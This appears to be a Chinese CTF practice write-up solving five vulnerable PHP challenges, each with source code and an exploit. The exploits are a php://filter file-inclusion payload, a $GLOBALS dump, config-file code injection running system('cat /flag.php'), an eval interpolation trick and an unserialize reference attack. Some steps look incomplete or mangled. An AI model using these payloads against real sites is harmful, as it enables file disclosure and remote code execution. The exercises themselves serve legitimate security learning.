没事干 随便刷刷题

1伪协议读取系统进程

源码

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {require_once $_GET['file'];
}

伪协议读取flag.php，/proc/self指向当前进程的

exp

?file=php://filter/read=convert.base64-encode/resource=file:///proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/flag.php

2超全局变量

<?php  error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){$args = $_GET['args'];if(!preg_match("/^\w+$/",$args)){die("args error!");}eval("var_dump($$args);");
}

一看到超全局变量就想到了 GLOBALS

3命令执行

<?php
if(!isset($_GET['option'])) die();
$str = addslashes($_GET['option']);
$file = file_get_contents('./config.php');
$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
file_put_contents('./config.php', $file);

访问config.php会报错 然后把GET参数暴露

exp:
config.php?8=system("cat /flag.php");

巧用花括号（考点：花括号用法）

<?
#GOAL: gather some phpinfo();
function flag(){echo "flag{I'm xxxxxxxxxxxxxxxxxxxx}";
}
$str=@(string)$_GET['str'];
@eval('$str="'.addslashes($str).'";');
?>

字符串${foobar}​中的foobar会被当作变量来处理

?str={{phpinfo()}}

flag在flag()中

?str={{flag()}}

PHP特性（考点：PHP中引用的特性）

<?php
#GOAL: get the secret;
class just4fun {var $enter;var $secret;
}if (isset($_GET['pass'])) {$pass = $_GET['pass'];if(get_magic_quotes_gpc()){$pass=stripslashes($pass);}$o = unserialize($pass);if ($o) {$o->secret = "flag{I'm xxxxxxxxxxxxxxxxxxxxxxxxxxxx}";if ($o->secret === $o->enter)echo "Congratulation! Here is my secret: ".$o->secret;elseecho "Oh no... You can't fool me";}else echo "are you trolling?";
}

exp

<?php
class just4fun {var $enter;var $secret;
}$a= new just4fun();
$a->enter= &$a->secret;
echo serialize($a);